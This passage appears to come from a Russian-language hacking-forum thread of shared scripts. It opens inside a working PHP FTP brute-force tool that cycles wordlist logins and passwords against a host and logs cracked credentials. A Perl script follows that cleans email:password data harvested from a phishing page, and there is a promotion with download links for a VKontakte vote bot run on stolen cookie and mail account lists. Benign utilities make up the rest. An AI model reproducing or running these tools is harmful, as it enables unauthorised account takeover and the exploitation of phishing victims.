<$port>\n"; echo "brute info after every <$kol> connections\n"; echo "pause between connections: <$pause> seconds\n"; echo "Working, wait please...\n\n"; $login = ''; // Brute $handle = fopen($file_login, "r"); while (!feof($handle)) { $login = trim(fgets($handle)); $open = ftp_connect($host,$port,"100"); // сервер, порт, таймаут if(!ftp_login($open,$login,$pass)) { $i++; if ($i==$kol) { $s = $s+$i; $i=0; $w = $p - $s; echo "Pass $s connections, remain $w logins, brute...\n"; sleep($pause); } } else { echo "\n\n\nSuccess connection!!!! Done."; echo "\n <<<Login : $login>>>"; ftp_close($open); // закрываем фтп-соединение fwrite($handle1,"Хост: $host, порт: $port, логин: $login, пароль: $pass". "\r\n"); fclose($handle1); fclose($handle); echo "\n\n\n [[[ All results was saved in <$file_result> ]]]"; exit; } } echo "\n\n\n [[[ Sorry, not found ]]]"; fclose($handle); fclose($handle1); } // Брут по словарю логин/пароль(не знаем ни логин ни пароль): if ($mode==3) { echo "\n\n Count logins" . $file_login_pass_del . "passwords, wait please..."; $login = ''; $pass = ''; $handle = fopen($file_login_pass, "r"); while ($buffer = fgets($handle)) $p++; fclose($handle); echo "\n\n\n$p logins" . $file_login_pass_del . "passwords...working\n\n"; echo "Will brute login" . $file_login_pass_del . "password\n"; echo "at host: <$host> \n"; echo "at port: <$port>\n"; echo "brute info after every <$kol> connections\n"; echo "pause between connections: <$pause> seconds\n"; echo "Working, wait please...\n\n"; $buffer = ''; $temp = array(); // Brute $handle = fopen($file_login_pass, "r"); while (!feof($handle)) { $buffer = trim(fgets($handle)); $temp = explode($file_login_pass_del,$buffer); $open = ftp_connect($host,$port,"100"); // сервер, порт, таймаут if(!ftp_login($open,$temp[0],$temp[1])) { $i++; if ($i==$kol) { $s = $s+$i; $i=0; $w = $p - $s; echo "Pass $s connections, remain $w login" . $file_login_pass_del . "password, brute...\n"; sleep($pause); } } else { echo "\n\n\nSuccess connection!!!! Done."; echo "\n <<<Login: {$temp[0]} | Password : {$temp[1]}>>>"; ftp_close($open); // закрываем фтп-соединение fwrite($handle1,"Хост: $host, порт: $port, логин: {$temp[0]}, пароль: {$temp[1]}". "\r\n"); fclose($handle1); fclose($handle); echo "\n\n\n [[[ All results was saved in <$file_result> ]]]"; exit; } } echo "\n\n\n [[[ Sorry, not found ]]]"; fclose($handle); fclose($handle1); } ?>
Недавно потребовалось отпарсить данные с фейка. Написал этот маленький скрипт, возможно кому-нибудь пригодится. Парсит по формату: мыло@хост<разделитель>пароль Убирает дублирующиеся мыльники (юзеры часто думают что ошиблись, и начинают вводить повторно). Code: #!/usr/bin/perl use warnings; use strict; my $delim = ':'; open IN, '<', 'in.txt' or die $!; chomp (my @lines = <IN>) && close IN; open OUT, '>', 'out.txt' or die $!; for (@lines) { print OUT $_, "\n" if (m#([a-z0-9][a-z0-9-_]+@[a-z0-9-_]+\.[a-z]{2,4})$delim\S+#ig) && ($_{$1}=!exists $_{$1}); } close OUT && print 'finished';
Скрипт обновил 16.06.09!Вот написал такой скриптек - [V]ote[R],который передаёт голоса вконтакте с профиля на профиль по спискам! Принцып роботы скрипта через это приложение http://vkontakte.ru/app577176 Скрипт работает так: ---> Логинимся ---> Добавляем приложение себе ---> Бросаем голоса на ID ---> Удаляем приложение. Вот что он умеет: |__[+] Работает с двумя списками акков: |____[+] Список cookies |____[+] Список mailass |__[+] Есть поддержка proxy |__[+] Написан на php с curl |__[+] Работает с антикапчей ! Капчу записывает в capcha.jpg на сервере. http://dump.ru/file/2912904 http://letitbit.net/download/7916aae252/Voterobf.rar.html http://depositfiles.com/files/b41zpwilc
Подсчитывает количество строк во всех файлах переходя по папкам из стартовой директории, т.е. в которой находится файл. PHP: <?php $strings = ''; function scan($dir = '.') { global $strings; chdir($dir); $opDir = opendir('.'); while($obj = readdir($opDir)) { if(is_file($obj)) { $stringsInFile = count(file($obj)); echo $obj.' - '.$stringsInFile.' strings;<br />'; $strings += $stringsInFile; } else if(is_dir($obj) && $obj != '.' && $obj != '..') scan($obj); } closedir($opDir); if($dir != '.') chdir('..'); } scan(); echo '<b><br />strings - '.$strings.'</b>'; ?> thx: SLESH, d_x, Gar|k
класс для сохранения переменных в себе юзаем: PHP: $a = 'aaaaaa'; include('selfVar.php'); // simple , how to use this $sv = new selfVar(); $sv->saveVar('a','AVALUE'); $sv->saveVar('b','BVALUE'); $sv->saveVar('ab','NEWWALUE'); unset($sv); $b = 'bbbbb'; echo $a.$b; запускаем скрипт, потом смотрим сорс, и увидем что: $a = 'AVALUE', $BVALUE = 'BVALUE', $ab = 'NEWWALUE'; PHP: // start of class selfVar class selfVar{ public $v,$f,$ff; function __construct($f=null){ $this->f = ($f==null)?$_SERVER['SCRIPT_FILENAME']:$f; if (!file_exists($this->f)) $this->f = null; } function getVars(){ if ($this->f==null) return null; $this->v = null; $this->ff= @implode('',@File($this->f)); if (preg_match_all('/(\$\w+)\s?=\s?(.+?)\s?;/',$this->ff,$m)) { unset($m[0]); $this->v = $m; return $m; } else { return null; } } function saveVar($n,$v,$i=1) { if ($this->f==null) return null; $m = $this->getVars(); if (in_array('$'.$n,$m[1])){ if (preg_match('/(\$'.$n.'\s?=\s?)(.+?)(\s?;)(.*)/',$this->ff,$m)) { $f1 = substr($this->ff,0,strpos($this->ff,$m[1])); $f2 = substr($this->ff,strpos($this->ff,$m[1])+strlen($m[1].$m[2].$m[3]),strlen($this->ff)); $ff = $f1.$m[1].'\''.$v.'\''.$m[3].$f2; $this->ff = $ff; } } else { $f1 = substr($this->ff,0,strpos($this->ff,'<?')+2); $f2 = substr($this->ff,strpos('<?',$this->ff)+strlen($f1)+2,strlen($this->ff)); $this->ff = $f1."\n$".$n.' = \''.$v."';\n".$f2; } $this->s($this->f,$this->ff); } function s($f,$t){ $x = fopen($f,'w'); fwrite($x,$t); fclose($x); } } // end of class selfVar http://uasc.org.ua/2009/06/php-selfvar/
Socks4/5 sorter and parser by erihtoney & mff PHP: <?php /* Socks4/5 sorter and parser by erihtoney & mff */ if(isset($_POST[go_sort])){ $source=$_POST[source]; $id=chr(13); $sort=explode("$id",$source); foreach($sort as $value){ if(strpos($value,"SOCKS4") OR strpos($value,"socks4")){ $socks4[]=$value; } if(strpos($value,"SOCKS5") OR strpos($value,"socks5")){ $socks5[]=$value; } } } ?> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" > <title>Socks4/5 sorter and parser by erihtoney & mff</title> </head> <body> <center><h1>Parser and sorter Socks4/5 </h1></center> <fieldset> <legend>main</legend> <form action="" style="display:inline;" method=POST> <table align="center" width="100%" border="0" cellspacing="4" cellpadding="4"> <tr> <td valign="top"><fieldset> <legend>Source</legend> <textarea id="source" rows="10" style="width:100%;" name="source"><?php if(isset($_POST[go_sort]) AND isset($_POST[source])){ echo $_POST[source]; } ?> </textarea> </fieldset></td> <td valign="top"><fieldset> <legend>Socks4</legend> <textarea id="socks4" rows="8" style="width:100%;" ><?php if(isset($_POST[go_sort]) AND !empty($_POST[source]) AND $socks4){ foreach($socks4 as $v){ $vv=preg_match('/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\:[0-9]{1,4}/',$v,$array_socks4); foreach($array_socks4 as $pure_socks4){ echo $pure_socks4." "; } } }?></textarea> </fieldset></td> <td valign="top"><fieldset> <legend>Socks5</legend> <textarea id="socks5" rows="8" style="width:100%;"><?php if(isset($_POST[go_sort]) AND !empty($_POST[source]) AND $socks5) { foreach($socks5 as $v){ $socks5_rw=preg_match('/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\:[0-9]{4}/',$v,$array_socks5); foreach ($array_socks5 as $pure_socks5){ echo $pure_socks5." "; } } } ?></textarea> </fieldset></td> </tr> <tr> <td align="right" colspan="3"><input type="submit" name="go_sort" value="Сортировать"> </td> </tr> </table> </form> </fieldset> </body> </html> гавнокод
proxy.php: PHP: <?php ############ # Граббер проксей с ip-whois.net # (ип;порт;дата;страна;анонимная/прозрачная) # запись натыренного в файл (proxy.html) # (c) Failure ############ error_reporting(0); set_time_limit(30); if(!file_exists("proxy.html")) include("get_proxy.php"); $f = fopen("proxy.html","r"); $buff = fread($f, filesize("proxy.html")); $buff = strstr($buff, "<table width = 100%>"); $bad = strstr($buff, "</tr></table></p>"); $buff = str_replace($bad, "", $buff); fclose($f); echo $buff; if(file_exists("proxy.html")) unlink("proxy.html"); $f = fopen("proxy.html","a+"); fwrite($f, $buff); fclose($f); ?> get_proxy.php PHP: <?php $sock = fsockopen("ip-whois.net", 80, $bla, $bla2); $out = "GET /proxy.php HTTP/1.1\r\n"; $out .= "Host: ip-whois.net\r\n"; $out .= "Content-Type: text/html\r\n"; $out .= "Referer: http://ip-whois.php/index.php\r\n\r\n"; fwrite($sock, $out); if(file_exists("proxy.html")) unlink("proxy.txt"); $fproxy = fopen("proxy.html","a+"); while(!feof($sock)) fwrite($fproxy, fgets($sock, 1000)); fclose($sock);fclose($fproxy); ?>
